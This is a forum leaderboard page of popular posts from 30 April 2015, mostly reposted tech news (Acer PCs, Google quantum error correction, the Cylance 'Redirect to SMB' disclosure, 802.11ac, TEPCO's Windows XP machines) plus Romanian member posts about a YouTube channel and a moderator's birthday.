Leaderboard
The search index is currently processing. Leaderboard results may not be complete.
Popular Content
Showing content with the highest reputation on 04/30/2015 in all areas
-
This post cannot be displayed because it is in a password protected forum. Enter Password
-
This post cannot be displayed because it is in a password protected forum. Enter Password
-
This post cannot be displayed because it is in a password protected forum. Enter Password
-
2 points
-
This post cannot be displayed because it is in a password protected forum. Enter Password
-
This post cannot be displayed because it is in a password protected forum. Enter Password
-
This post cannot be displayed because it is in a password protected forum. Enter Password
-
A Colorado man says he has no regrets after unloading eight rounds into his dysfunctional Dell desktop, though he faces a fine for doing so. “I just had it,” Lucas Hinch, 38, told The Smoking Gun (via Ars Technica). Apparently the PC had thrown up one too many blue screens of death in recent months, so Hinch took it into an alley, loaded up a 9mm Hi-Point pistol that he’d purchased on Craiglist, and let the bullets fly. “It was glorious,” Hinch told the Los Angeles Times. “Angels sung on high.” Hinch admitted that the murder was “premeditated, oh, definitely,” and that he’d made sure there was nothing behind the desktop, and nothing from which the rounds could ricochet. The deed went down behind Hinch’s home, where he and his girlfriend also run a homeopathic herb store. Despite his precautions, Colorado Springs police issued Hinch a citation for discharging a firearm within city limits. (The local police blotter summarizes the incident as “Man Kills His Computer.”) Hinch faces a possible fine, but jail time is highly unlikely according to the Times. While the cops confiscated the gun, they left the computer behind, letting it remain a tribute to frustrated PC users everywhere. The impact on you: Hey, we’ve all felt the pain of dealing with an overly cranky desktop before. Kudos to this guy for letting us live vicariously through his act of retaliation—and absorbing the legal ramifications so we don’t have to.2 points
-
Acer is trying to cover all the bases with its back-to-school Windows PC lineup, announced en masse at an event Thursday in New York. The slew of new computers are all due out this summer, ranging from sub-$300 laptop-tablet hybrids to desktop replacements with dedicated graphics cards. They’re all shipping with Windows 8.1, and are all compatible for Windows 10 when it arrives (we think) later this summer. There’s nothing particularly remarkable here, but the starting prices are low, and some of the laptops have a neat-sounding feature that reduces blue light from the screen, so you can work longer without eye strain. Why this matters: Even if you have zero interest in Acer’s hardware, it’s worth noting that the company isn’t waiting for Windows 10 to release its back-to-school range. Microsoft is reportedly aiming for a late July launch, but we’re guessing many PC makers aren’t willing to leave the lucrative student shopping season to chance. Acer’s lineup in a nutshell Here’s a rundown of what Acer plans to launch: Acer Aspire R 11: This Lenovo Yoga-like convertible laptop has an 11.6-inch display with a 360-degree hinge. Other specs include an Intel Pentium processor, up to 8GB of RAM, and up to a 1GB hard drive. The display has special modes to reduce eye strain from blue light, and the battery lasts up to eight hours. It’s set for a July launch, with a $249 starting price. Acer Switch 10: A tablet-laptop hybrid with a 10-inch 1920x1200 resolution display, Intel Atom quad-core processor, 2GB of RAM, up to 64GB of storage, and a 2MP front camera. The tablet alone weights 1.31 pounds and measures 0.35 inches thick. A keyboard dock brings the weight to 2.64 pounds, and has an optional hard drive up to 1TB. It’s coming in July, starting at $279. Acer Switch 10 E: Another 10-inch 2-in-1 with a 1280x800-pixel display, Intel Atom quad-core processor, 2GB of RAM, up to 64GB of storage, and dual 2MP cameras. The tablet alone weights 1.39 pounds and measures 0.43 inches thick. With the keyboard dock (which has an optional hard drive up to 1TB), it weighs 2.82 pounds. Prices start at $399 with an August launch. Acer Aspire V 15: This 15-inch laptop has an Intel core processor, Nvidia GeForce 940M graphics, up to 16GB of RAM and a choice of up to a 2TB hard drive or up to a 1TB solid state drive. It also has aluminum trim and a backlit keyboard. Acer says the starting prices are $599, but it’s unclear what you’ll get for tech specs at that price. Acer Aspire E: Acer’s meat-and-potatoes laptops come in 14-inch, 15.6-inch, and 17.3-inch flavors, all with Intel processors and a choice of Nvidia GeForce 940M or AMD Radeon R8 and R6 graphics. Other specs include up to 16GB of RAM and up to either a 2TB hard drive or 1TB solid state drive. Prices start at $379 for the 14-inch model—presumably with far inferior specs to what’s listed here—with July shipping. Acer Aspire ES: This looks to be a cheaper tier than Acer’s E Series, with five screen sizes ranging from 11.6-inch to 17.3-inch variants. They’ll have Intel Pentium or Celeron processors, up to 8GB of RAM, up to 1TB of storage and an optional DVD drive. Prices will start at $229 for the 11-inch model this July.2 points
-
A year ago, Acer was struggling and Jason Chen, its newly appointed CEO, thought the company could stay afloat by cutting its reliance on PCs and expanding in wearables and mobile devices. In view of the success of its Chromebooks and the pending release of Microsoft’s Windows 10, however, Chen is now doubling down on PCs. Chen is interested in gamers, in particular. The company wants to offer premium gaming products that could compete with desktop PCs from boutique companies like Origin PC and Falcon Northwest. In a flat PC market, gaming is a “bright spot,” and Acer is planning to release products that Chen says could appeal to the most avid gamer. “We don’t want to do amateur, part-time work,” Chen said in an interview. Acer wants to be the first PC maker to offer a complete lineup of gaming products including PCs, monitors and mobile devices, he said. At a lavish event in New York, Acer laid out a lineup of new gaming products including Predator laptops, desktops and a tablet. It was labeled as a “sneak peak.” Reporters were able to handle the devices, but were not able to boot them up. The stylish 8-inch tablet, which will ship in the third quarter, attracted the most attention. Acer declined to offer details on the device, which may end up getting a reception similar to that of Nvidia’s Shield tablet, which has a limited audience. Aside from Nintendo’s DS, portable devices like Sony’s PlayStation Vita or Nvidia’s Shield haven’t sold well. Acer also showed off the Acer XR341CKA, a curved gaming monitor that can display images at 3440 x 1440 pixels. It supports Nvidia’s G-Sync technology, which provides a smooth gaming experience by working in conjunction with GeForce graphics cards to display better images and reduce stutter and lag. The curved monitor will become available in the U.S. starting in September for $1,299. A complete lineup The gaming monitor, tablet, desktops and laptops give Acer a complete gaming product lineup that other PC makers can’t boast, Chen said. “This year, every two to three months, you will see new products come out for gaming,” Chen said. Acer will target Predator at the hard-core gamer crowd, and the existing V-Nitro brand for less serious gamers who may also use the PC for business. Meanwhile, Chen feels gamers are attracted by more than hardware, and that Acer needs to be involved in the gaming community. The company has formed a worldwide “Team Acer” group, to take part in and sponsor gaming events as part of its strategy to build relationships with gamers. Acer’s aggressive chase of the gaming market comes just as Microsoft releases Windows 10, which will provide a better gaming experience, with DirectX 12 APIs. But Acer is going to have to do a lot more than release fully loaded PCs. Big PC makers like Dell and Hewlett-Packard already have strong gaming offerings with unique designs and the latest and greatest technologies. Dell has been the more aggressive of the bunch with its Alienware brand, which has a Steam-ready gaming console and a unique accessory in which powerful graphics processors can be attached to a gaming laptop. Acer has made some progress in the PC market over the last year, becoming the largest Chromebook seller. The company was the world’s fifth largest PC maker in 2014, but its PC shipments declined in the first quarter this year by 7 percent year over year. The company did well in the U.S., but was hit hard in the EMEA (European, Middle East and Africa) market due to pricing pressure.2 points
-
Quantum computers won’t ever outperform today’s classical computers unless they can correct for errors that disrupt the fragile quantum states of their qubits. A team at Google has taken the next huge step toward making quantum computing practical by demonstrating the first system capable of correcting such errors. Google’s breakthrough originated with the hiring of a quantum computing research group from the University California, Santa Barbara in the autumn of 2014. The UCSB researchers had previously built a system of superconducting quantum circuits that performed with enough accuracy to make error correction a possibility. That earlier achievement paved the way for the researchers—many now employed at Google—to build a system that can correct the errors that naturally arise during quantum computing operations. Their work is detailed in the 4 March 2015 issue of the journal Nature. “This is the first time natural errors arising from the qubit environment were corrected,” said Rami Barends, a quantum electronics engineer at Google. “It’s the first device that can correct its own errors.” Quantum computers have the potential to perform many simultaneous calculations by relying upon quantum bits, or qubits, that can represent information as both 1 and 0 at the same time. That gives quantum computing a big edge over today’s classical computers that rely on bits that can only represent either 1 or 0. But a huge challenge in building practical quantum computers involves preserving the fragile quantum states of qubits long enough to run calculations. The solution that Google and UCSB have demonstrated is a quantum error-correction code that uses simple classical processing to correct the errors that arise during quantum computing operations. Such codes can’t directly detect errors in qubits without disrupting the fragile quantum states. But they get around that problem by relying on entanglement, a physics phenomenon that enables a single qubit to share its information with many other qubits through a quantum connection. The codes exploit entanglement with an architecture that includes “measurement” qubits entangled with neighboring “data” qubits. The Google and UCSB team has been developing a specific quantum error-correction code called “surface code.” They eventually hope to build a 2-D surface code architecture based on a checkerboard arrangement of qubits, so that “white squares” would represent the data qubits that perform operations and “black squares” would represent measurement qubits that can detect errors in neighboring qubits. For now, the researchers have been testing the surface code in a simplified “repetition code” architecture that involves a linear, 1-D array of qubits. Their unprecedented demonstration of error correction used a repetition code architecture that included nine qubits. They tested the repetition code through the equivalent of 90,000 test runs to gather the necessary statistics about its performance. “This validates years and years of theory to show that error correction can be a practical possibility,” said Julian Kelly, a quantum electronics engineer at Google. Just as importantly, the team’s demonstration showed that error correction rates actually improved when they increased the number of qubits in the system. That’s exciting news for quantum computing, because it shows that larger systems of qubits won’t necessarily collapse under a growing pile of errors. It means that larger quantum computing systems could be practical. For instance, the team compared the error rate of a single physical qubit with the error rate of multiple qubits working together to perform logic operations. When they used the repetition code array of five qubits, the logical error rate was 2.7 times less than the single physical qubit error rate. A larger array of nine qubits showed even more improvement with a logical error rate 8.5 times less than the single physical qubit error rate. As Kelly explains: “One, we wanted to show a system where qubits are cooperating and outperforming any single qubit. That’s an important milestone. Even more exciting than that, when we go from five to nine qubits, it gets better. If you want to get a better error rate, you add more qubits.” This first demonstration of error correction shows a clear path forward for scaling up the size of quantum computing systems. But on its own terms, it still falls well short of the error correction rate needed to make quantum computing practical, said Austin Fowler, a quantum electronics engineer at Google. The team would need to improve error correction rates by 5 to 10 times in order to make quantum computing truly practical. Still, the current quantum computing system managed to maintain coherence in the quantum states of its qubits despite all the uncorrected errors—a fact that left the researchers feeling optimistic about the [CENSORED]ure. Their work was supported with government funding from the Intelligence Advanced Research Projects Activity and Army Research Office grants. The latest error correction demonstration would mainly work with universal logic-gate quantum computers; systems that would represent super-fast versions of today’s classical “gate-model” computers. But Google has also invested in the alternate “quantum annealing” approach of Canadian company D-Wave Systems. D-Wave’s quantum annealing machines have sacrificed some qubit coherence to scale up quickly in size to the 512-qubit D-Wave Two machine—a system that dwarfs most experimental quantum computing systems containing just several qubits. Google has turned to John Martinis, a professor of physics at the University of California, Santa Barbara, along with his former UCSB researchers now on Google’s payroll, to try building a more stabilized version of D-Wave’s quantum annealing machines.2 points
-
In March 2012 Alex Teichman was a Ph.D. student in Stanford University’s computer science department, working on self-driving cars. His goal: to help a self-driving car understand the environment around it, in particular, to be aware of pedestrians, bicyclists, and other moving objects that might come into its path. His approach: instead of traditional image analysis, use depth information about objects gathered by laser rangefinders or sensors to define them, and then teach the computer to learn about the objects by “following” them as they move about the scene. While the math he developed to implement this is complex, Teichman says the basic idea is simple. “Have you ever seen a child ride up a glass elevator that looks down on the street? At ground level, a car parked out front looks normal and uninteresting, but as she rides upwards, things gradually start looking very different. She’s probably seeing the world in a very different way and perhaps giggling about it. And her visual systems are learning: ‘Hey, that’s what a car looks like form above, I’ve never seen that before, cool!’” In the self-driving car world, Teichman used this technology to make the car’s computers better able to recognize important things in the world around them with less manual training. “Imagine there is a bicyclist riding around on Stanford’s campus,” says Teichman. “He is in the normal pose of a bicyclist, leaning forward, and the software recognizes him as a bicyclist. But say that he takes his hands off the handlebars and leans back. A computer vision system might not recognize this because it’s never seen it before. However, [my] algorithm knows it is still a bicyclist, because it saw it previously and was tracking it over time, so it now knows it’s the same thing. It can now learn from that. With this kind of is semi supervised machine learning, I would sit down and label 10 examples of things that are bicyclists and not bicyclists, and then give the system unannotated data gathered by just driving around with the car. It reduced the amount of manual annotation by an order of magnitude or two.” Teichman wasn’t thinking about other applications for this technology beyond autonomous vehicles—until a strange set of circumstances at home spooked him a bit. He lived in a small rental cottage in Palo Alto. One day, he found a notice on the door informing him that a contractor for a local utility needed to perform a pipe inspection. He scheduled the inspection, let in the person who arrived, but then the person simply walked around the cottage and left; he didn’t seem all that focused on the pipes. Within days of that visit, and after reading a local police report about an upswing in home burglaries, Teichman started getting a series of phone solicitations that seemed odd to him—and far more frequent than usual. There were security companies wanting to schedule appointments, debt collectors looking for people that didn’t live there, people calling in sick to companies he’d never heard of. Had a burglar cased his home, and was now trying to figure out his typical schedule? He decided to put together his own home security system, using the computer vision technology he’d been working on. The system, running on two laptops and connected to commercial range-sensing cameras similar to the Microsoft Kinect, would know the difference between a tree branch blowing in front of a window (because the branch had already been there, and had simply started to move when the wind came up), or a person climbing up and looking in that window because the person was new to the scene. He programmed the computer to, if it detected and intruder, send a short video clip off site; that way if his computer got stolen, he’d still have the data. And then he left for a backpacking trip. At this point, Teichman says, he was actually hoping he’d get burglarized, so he could see how well his system worked. He didn’t. The phone calls—and his fears—eventually went away, and Teichman didn’t think much more about that project, until 2014, when he and fellow Stanford student Hendrik Dahlkamp (co-inventor of the technology that became Google Street View) started talking about Teichman’s system at a party. “We realized together that there was huge potential here for a real product. The two started that summer to turn Teichman’s DIY project into that product. The idea was to build an inexpensive, easy to set up home security device that understands the difference between your dog and an intruder, will alert you via an app to any suspected problems and will call the police if you don’t respond. They incorporated as a company in October of last year, then went through the StartX program, a startup boot camp for Stanford students, alumni, and faculty.2 points
-
After testing dozens of applications, Cylance identified 31 vulnerable software packages that can be abused to leak login credentials using this vulnerability. They included po[CENSORED]r applications such as Adobe Reader, Apple QuickTime and Windows Media Player, as well as several antivirus, security, team and developer tools. They disclosed this to CERT at Carnegie Mellon University in late February. The CERT unit of the Software Engineering Institute at Carnegie Mellon University, which tracks computer bugs and internet security issues, issued information about this on Monday. According to a Cylance blog posting by Brian Wallace on Monday, "Carnegie Mellon University CERT disclosed the vulnerability to the public today (#VU672268), following six weeks of working with vendors to help them mitigate the issue." The CERT information, headlined "Vulnerability Note VU#672268, Microsoft Windows NTLM automatically authenticates via SMB when following a file:// URL," spelled out the problem: "Software running on Microsoft Windows that utilizes HTTP requests can be forwarded to a file:// protocol on a malicious server, which causes Windows to automatically attempt authentication via SMB to the malicious server in some circumstances. The encrypted form of the user's credentials are then logged on the malicious server. This vulnerability is alternatively known as 'Redirect to SMB'." The Cylance team uncovered Redirect to SMB while hunting for ways to abuse a chat client feature providing image previews. Wallace said that the "Redirect to SMB" is most likely to be used in targeted attacks by advanced actors—attackers must have control over some component of a victim's network traffic. Bill Rigby of Reuters further explained that if a hacker can get a Windows user to click on a bad link in an email or on a website, "it can essentially hijack communications and steal sensitive information once the user's computer has logged on to the controlled server." Rigby said, though, that in the latest variation of the technique, Cylance said users could be "hacked without even clicking on a link." That could happen if attackers intercepted "automated requests to log on to a remote server issued by applications running in the background of a typical Windows machine, for example, to check for software updates." But wait. Microsoft said the threat posed by the purported weakness was not as great as Cylance supposed. Reuters quoted an emailed statement from Microsoft, "Several factors would need to converge for a 'man-in-the-middle' cyberattack to occur. Our guidance was updated in a Security Research and Defense blog in 2009, to help address potential threats of this nature. There are also features in Windows, such as Extended Protection for Authentication, which enhances existing defenses for handling network connection credentials." Chris Paoli in GCN, a site for public-sector IT professionals, pointed out that "While the Cylance team has been able to provide proof of concept for the flaw, it said that there have been no known attacks using Redirect to SMB." What does the CERT think of all this? Under the "Solution" heading, the announcement said "The CERT/CC is currently unaware of a full solution to this problem." They said that affected users may consider a number of workarounds: Consider blocking outbound SMB connections (TCP ports 139 and 445) from the local network to the WAN; update NTLM group policy; do not use NTLM for authentication by default in applications; use a strong password and change passwords frequently. The CERT note thanked Brian Wallace of Cylance for reporting the vulnerability.2 points
-
An image of a polar bear on a shrinking or growing iceberg helps users of the "My Earth" energy use tracking app visualize the impacts of their daily activities. Credit: Dylan Moriarty For a generation motivated by technology and fast-moving information, a professor at the University of Wisconsin-Madison has created an energy-tracking app to make reducing day-to-day energy usage more accessible. Nancy Wong, a professor of consumer science in the UW-Madison School of Human Ecology, designed the new app with a diary format in which users can choose daily activities to reduce their carbon emissions and energy consumption. Called "My Earth—Track Your Carbon Savings," the app will launch on April 20 during the Nelson Institute Earth Day Conference. UW-Madison computer sciences Professor Suman Banerjee initially approached Wong for a consumer perspective on a project student John Meurer was developing. Working together, they quickly realized many opportunities to make the proposed app more user-friendly and customizable. Drawing on parallels between food consumption and energy use, Wong's team designed "My Earth" with approaches used in food-tracking apps that help users catalog their daily eating habits. "We tried to categorize it into the different kinds of activities that you can do so that people can select from whatever suits their lifestyle," Wong says. The app is organized with five main categories: electricity, recycling, travel, food and usage. Each category includes day-to-day activities as simple as recycling a milk jug to more complicated actions, such as upgrading to a high-efficiency toilet that reduces the need for energy-intensive wastewater treatment. As users check off activities in their individual diaries, they accumulate saved carbon units. Wong wanted the app to track daily progress visually to help users see how smaller steps can build to achieve a larger goal and that individual actions can have broader impact. Research assistant Andrew Stevens came up with the idea of using a polar bear clinging to a small iceberg to represent the impacts of the chosen activities. The more carbon units and energy saved, the larger the iceberg becomes, Wong says. "The iceberg is going to grow and then eventually the bear can sit on it," she says. "I want it to grow organically, so that it gets bigger, so you can have another bear, so then you can have a bear family." Wong says she hopes people will use "My Earth" to identify and prioritize energy-saving activities. She was motivated to work on the app by a belief that behaviors need to be simple and understandable in order to become sustainable. "There is a real disconnect between what people say that they want to do in terms of their attitudes toward the environment and conservation and translating that into actual behavior," Wong says. "Carbon units are too abstract for people to understand. Translating conservation behaviors into something tangible, such as a growing iceberg, could help." The free app is available for both iOS and Android platforms. Attendees at the Nelson Institute Earth Day Conference on April 20 can also visit Wong's booth to learn more. "Most of the time, I see (lack of concern for the environment) as a failure to connect individual action to that bigger picture," Wong says. "Hopefully the app could help you understand actually whatever you do is not insignificant and this is how you can contribute."2 points
-
This post cannot be displayed because it is in a password protected forum. Enter Password
-
Salutare,ma numesc Artiom si am 19 ani,de vreo cateva saptamani mam apucat de Youtube,anume de Gaming,am un canal care creste pe zi ce trece.Am facut din asta un Hobby,nu un mijloc de generare de bani. Canal : https://www.youtube....ch4sChymPi4sYXA Daca ati da subscribe ma veti ajuta foarte mult Am mai multe genuri de joc,acestea le puteti vedea aici : https://www.youtube....4sYXA/playlists Nu uitati de subscribe,va multumesc anticipat Si puteti lasa si o parere despre canal1 point
-
Cum a spus si d3v incearca Minecraft pentru inceput.Daca ai o placa video nasoala iti trebuie un mod numit "Opti-Fine".Am si eu un laptop mai low dar cu acel mod merge.Nu conteaza,mereu mi-au placut episoadele mai lungi.Ca sa ajungi departe cu YouTube-ul trebuie sa ai rebdare si sa fi original.La Minecraft am auzit ca oameni sau plictisit.Toti fac bani din asta.Am sa urmaresc si eu progresul tau.Noroc!1 point
-
Astazi avem onoarea de a celebra aniversarea dragului nostru moderator Călin™, care implineste astazi minunata varsta de 18 ani. El este cu noi de foarte mult timp, de mai mult de doi ani, facand de asemenea parte din Staff-ul comunitatii pentru o lunga perioada de timp, fiind mereu dornic sa ajute membrii la nevoie si venind intotdeauna cu idei inovative si originale. De asemenea, pot spune ca a fost si imi este un foarte bun prieten, mereu fiind o placere sa vorbim, chiar daca el este mai rusinos si nu vrea sa isi prezinte "glasciorul" . Tin sa conchid prin a ii ura un mare: LA MULTI ANI, sa ai parte de tot ceea ce iti doresti, sa reusesti in tot si in toate, sa iei permisul din prima (sa ne plimbi si pe noi ) si sa iei la simulare la BAC 10 la ambele si la fel si la examen la anu'. https://www.youtube.com/watch?v=bJ7B9x027uc Sorry for the long post, here is an anniversary potato1 point
-
1 point
-
1 point
-
1 point
-
La mulți ani Căline și multă sănătate , tot ce-ți dorești să ți se îndeplinească.1 point
-
1 point
-
This post cannot be displayed because it is in a password protected forum. Enter Password
-
This post cannot be displayed because it is in a password protected forum. Enter Password
-
This post cannot be displayed because it is in a password protected forum. Enter Password
-
This post cannot be displayed because it is in a password protected forum. Enter Password
-
Energy efficiency is (if you’ll pardon the pun) a hot topic. Foundries and semiconductor manufacturers now trumpet their power saving initiatives with the same fervor they once reserved for clock speed improvements and performance improvements. AMD is no exception to this trend, and the company has just published a new white paper that details the work it’s doing as part of its ’25×20′ project, which intends to increase performance per watt by 25x within five years. If you’ve followed our discussions on microprocessor trends and general power innovation, much of what the paper lays out will be familiar. The paper steps through hUMA (Heterogeneous Unified Memory Access) and the overall advantages of HSA, as well as the slowing rate of power improvements delivered strictly by foundry process shrinks. The most interesting area for our purposes is the additional information AMD is offering around Adaptive Voltage and Frequency Scaling, or AVFS. Most of these improvements are specific to Carrizo — the Carrizo-L platform doesn’t implement them. AVFS vs DVFS There are two primary methods of conserving power in a microprocessor — the aforementioned AVFS, and Dynamic Voltage and Frequency Scaling, or DVFS. Both AMD and Intel have made use of DVFS for over a decade. DVFS uses what’s called open-loop scaling. In this type of system, the CPU vendor determines the optimal voltage for the chip based on the target application and frequency. DVFS is not calibrated to any specific chips — instead, Intel, AMD, and other vendors create a statistical model that predicts what voltage level a chip that’s already verified as good will need to operate at a given frequency. DVFS is always designed to incorporate a significant amount of overhead. A CPU’s operating temperature will affect its voltage requirements. And since AMD and Intel don’t know if any given SoC will be operating at 40C or 80C, they tweak the DVFS model to ensure a chip won’t destabilize. In practice, this means margins of 10-20% at any given point.1 point
-
If you’re looking for faster WiFi performance, you want 802.11ac — it’s as simple as that. In essence, 802.11ac is a supercharged version of 802.11n (the current WiFi standard that your smartphone and laptop probably use), offering link speeds ranging from 433 megabits-per-second (Mbps), all the way through to several gigabits per second. To achieve speeds that are dozens of times faster than 802.11n, 802.11ac works exclusively in the 5GHz band, uses a ton of bandwidth (80 or 160MHz), operates in up to eight spatial streams (MIMO), and employs a kind of technology called beamforming. For more details on what 802.11ac is, and how it will eventually replace wired gigabit Ethernet networking at home and in the office, read on. How 802.11ac works Years ago, 802.11n introduced some exciting technologies that brought massive speed boosts over 802.11b and g. 802.11ac does something similar compared with 802.11n. For example, whereas 802.11n had support for four spatial streams (4×4 MIMO) and a channel width of 40MHz, 802.11ac can utilize eight spatial streams and has channels up to 80MHz wide — which can then be combined to make 160MHz channels. Even if everything else remained the same (and it doesn’t), this means 802.11ac has 8x160MHz of spectral bandwidth to play with, vs. 4x40MHz — a huge difference that allows it to squeeze vast amounts of data across the airwaves. To boost throughput further, 802.11ac also introduces 256-QAM modulation (up from 64-QAM in 802.11n), which basically squeezes 256 different signals over the same frequency by shifting and twisting each into a slightly different phase. In theory, that quadruples the spectral efficiency of 802.11ac over 802.11n. Spectral efficiency is a measure of how well a given wireless protocol or multiplexing technique uses the bandwidth available to it. In the 5GHz band, where channels are fairly wide (20MHz+), spectral efficiency isn’t so important. In cellular bands, though, channels are often only 5MHz wide, which makes spectral efficiency very important. 802.11ac also introduces standardized beamforming (802.11n had it, but it wasn’t standardized, which made interoperability an issue). Beamforming is essentially transmitting radio signals in such a way that they’re directed at a specific device. This can increase overall throughput and make it more consistent, as well as reduce power consumption. Beamforming can be done with smart antennae that physically move to track the device, or by modulating the amplitude and phase of the signals so that they destructively interfere with each other, leaving just a narrow, not-interfered-with beam. 802.11n uses this second method, which can be implemented by both routers and mobile devices. Finally, 802.11ac, like 802.11 versions before it, is fully backwards compatible with 802.11n and 802.11g — so you can buy an 802.11ac router today, and it should work just fine with your older WiFi devices. The range of 802.11ac In theory, on the 5GHz band and using beamforming, 802.11ac should have the same or better range than 802.11n (without beamforming). The 5GHz band, thanks to less penetration power, doesn’t have quite the same range as 2.4GHz (802.11b/g). But that’s the trade-off we have to make: There simply isn’t enough spectral bandwidth in the massively overused 2.4GHz band to allow for 802.11ac’s gigabit-level speeds. As long as your router is well-positioned, or you have multiple routers, it shouldn’t matter a huge amount. As always, the more important factor will likely be the transmission power of your devices, and the quality of their antennae. How fast is 802.11ac? And finally, the question everyone wants to know: Just how fast is WiFi 802.11ac? As always, there are two answers: the theoretical max speed that can be achieved in the lab, and the practical maximum speed that you’ll most likely receive at home in the real world, surrounded by lots of signal-attenuating obstacles. The theoretical max speed of 802.11ac is eight 160MHz 256-QAM channels, each of which are capable of 866.7Mbps — a grand total of 6,933Mbps, or just shy of 7Gbps. That’s a transfer rate of 900 megabytes per second — more than you can squeeze down a SATA 3 link. In the real world, thanks to channel contention, you probably won’t get more than two or three 160MHz channels, so the max speed comes down to somewhere between 1.7Gbps and 2.5Gbps. Compare this with 802.11n’s max theoretical speed, which is 600Mbps. Top-performing routers today (April 2015) include the D-Link AC3200 Ultra Wi-Fi Router (DIR-890L/R), the Linksys Smart Wi-Fi Router AC 1900 (WRT1900AC), and the Trendnet AC1750 Dual-Band Wireless Router (TEW-812DRU), as our sister site PCMag reports. With these routers, you can certainly expect some impressive speeds from 802.11ac, but it still won’t replace your wired Gigabit Ethernet network just yet. In Anandtech’s 2013 testing, they paired a WD MyNet AC1300 802.11ac router (up to three streams), paired with a range of 802.11ac devices that supported either one or two streams. The fastest data rate was achieved by a laptop with an Intel 7260 802.11ac wireless adapter, which used two streams to reach 364 megabits per second — over a distance of just five feet (1.5m) At 20 feet (6m) and through a wall, the same laptop was the fastest — but this time maxing out at 140Mbps. The listed max speed for the Intel 7260 is 867Mbps (2x433Mbps streams). In situations where you don’t need the maximum performance and reliability of wired GigE, though, 802.11ac is very compelling indeed. Instead of cluttering up your living room by running an Ethernet cable to the home theater PC under your TV, 802.11ac now has enough bandwidth to wirelessly stream the highest-definition content to your HTPC. For all but the most demanding use cases, 802.11ac is a very viable alternative to Ethernet. The [CENSORED]ure of 802.11ac 802.11ac will only get faster, too. As we mentioned earlier, the theoretical max speed of 802.11ac is just shy of 7Gbps — and while you’ll never hit that in a real-world scenario, we wouldn’t be surprised to see link speeds of 2Gbps or more in the next few years. At 2Gbps, you’ll get a transfer rate of 256MB/sec, and suddenly Ethernet serves less and less purpose if that happens. To reach such speeds, though, chipset and device makers will have to suss out how to implement four or more 802.11ac streams, both in terms of software and hardware. We imagine Broadcom, Qualcomm, MediaTek, Marvell, and Intel are already well on their way to implementing four- and eight-stream 802.11ac solutions for integration in the latest routers, access points, and mobile devices — but until the 802.11ac spec is finalized, second-wave chipsets and devices are unlikely to emerge. A lot of work will be have to done by the chipset and device makers to ensure that advanced features, such as beamforming, comply with the standard and are interoperable with other 802.11ac devices.1 point
-
The Tokyo Electric Power Company (TEPCO) has been under intense scrutiny ever since the 2011 meltdown at the Fukushima Daiichi nuclear energy complex. Following an investigation by Japan’s Board of Audit, TEPCO has been told to upgrade its computer systems. That doesn’t sound particularly unusual, except that TEPCO operates more than 48,000 PCs all running Windows XP. Oh, and they’re connected to the Internet. The Board of Audit is digging into TEPCO’s finances largely because the Japanese government wants the company to pay for ongoing cleanup efforts around Fukushima. It’s no surprise either. The 2011 meltdown was the largest nuclear disaster since Chernobyl in 1986. Decommissioning the plant is expected to cost tens of billions of dollars and take 30-40 years. No one is alleging that Windows XP was the cause of the disaster, of course. Power plant infrastructure runs on more robust embedded platforms, though TEPCO didn’t plan ahead very well in the case of Fukushima. The chain of events that led to the runaway fission reaction have been thoroughly investigated, from the tsunami to the system failures that prevented reactor shutdown. The heavy reliance on Windows XP could, however, be seen as more evidence of complacency within TEPCO. Windows XP was released in 2001, and enjoyed update support from Microsoft for more than a decade until it was finally cut off in 2014. That was after several extensions due to the poor performance of subsequent versions of Windows. A lack of security patches means XP systems will be vulnerable to any and all security flaws that are discovered going forward. This might not be a huge deal if the TEPCO computers weren’t connected to the Internet. TEPCO was reportedly aware of how dated its systems were (it would be hard not to), but had actively chosen to keep using XP until at least 2019 as a cost-saving measure. That means TEPCO workers would be using 18-year-old software by the time it was upgraded. It is possible for businesses to pay Microsoft large sums of money for custom XP support, but obviously TEPCO was not doing that. The Board of Audit calls this out as not only catastrophically unsafe, but not even likely to result in cost savings. Supporting ancient operating systems like this only gets harder as hardware and software moves on to support more modern platforms. TEPCO has reportedly agreed to make the upgrades. But really, it shouldn’t have taken a government audit to convince an operator of nuclear power plants that using outdated, insecure computers is a bad idea.1 point
-
There are claims that Microsoft is to retire its Internet Explorer web browser and replace it with an all-new browser called Spartan with the upcoming release of Windows 10. As of February 2015, Internet Explorer's (IE) market share slipped to second place with around 17%, while Google's Chrome browser boasted more than 42%. One clear challenge for Microsoft is that it has always been committed to producing its own browser for its own Windows operating system (supporting IE on Apple Macs for a brief period). Apple on the other hand is happy to produce versions of its Safari browser for both Mac OS X and Windows, and Google produces versions of Chrome for every po[CENSORED]r desktop and mobile operating system. Perhaps Microsoft feels it's time to take some action – in which case what is it trying to accomplish? A quick history IE was introduced as an add-on for Windows 95 and was a key part of the internet boom of the 1990s. Bundled free in all subsequent versions of Windows, it soon gained dominance, winning the browser war against its older competitor, Netscape. With a browser share that grew to be as substantial as Microsoft Windows' dominance of the operating system market, Microsoft was subject to numerous anti-trust litigation cases in the US and Europe. Nevertheless some of the HTML elements introduced in IE, and the fact it was more forgiving of badly coded websites than Netscape, meant that IE had a lasting influence on web design and the way websites were designed. This was especially so for internal corporate websites, which often used Windows-based systems. In the 2000s, disquiet over Microsoft's anti-competitive behaviour and IE's lack of proper standards support led to a flourishing of competitors, boosted by the open sourcing of Netscape, which would become the basis for the po[CENSORED]r Firefox browser. In reaction to Microsoft's approach of pushing its own technologies and ignoring open standards, the appeal of more rigorous web standards compliance demonstrated by other browsers including Opera, Safari and Chrome have since carved away at IE's dominance. Additionally, IE became one of the worst offenders for security vulnerabilities. Since then, it's become the browser everyone loves to hate.1 point
-
No doubt you've run across your share of PDF documents in your work and personal life. Adobe's Portable Document Format has become a common way to publish newsletters, instruction manuals and even tax forms. Creating your own PDF document is easy, with features built into major Web browsers and Apple's Mac system, or available through an array of free Windows apps. So why pay $156 or a more a year for Adobe's Acrobat DC service? You get those free capabilities in one place, plus features for filling out forms, appending digital signatures and making changes on the go. ___ THE BASICS Many people already use Adobe's free Acrobat Reader for reading documents. But to create documents, you need to pay for Acrobat, or use a free PDF creator from an outside party. Not all PDF creators are the same, though. Some convert text to graphics, for instance, so you're unable to search documents later. And editing capabilities tend to be limited and cumbersome. I create a lot of PDF files instead of printing out records. Free tools are typically adequate for that, but Acrobat is much easier for rotating and reordering pages and combining multiple PDF documents into a single file. Acrobat also makes it easy to edit text and convert documents back to their original form, whether that's in Word or a Web page. Adobe Systems Inc. also makes an iPad version, though with fewer features. Versions for iPhones, Android and Windows Phone devices have even less. Files you create and edit will sync through Adobe's Document Cloud storage service. All this comes with Acrobat DC.1 point
-
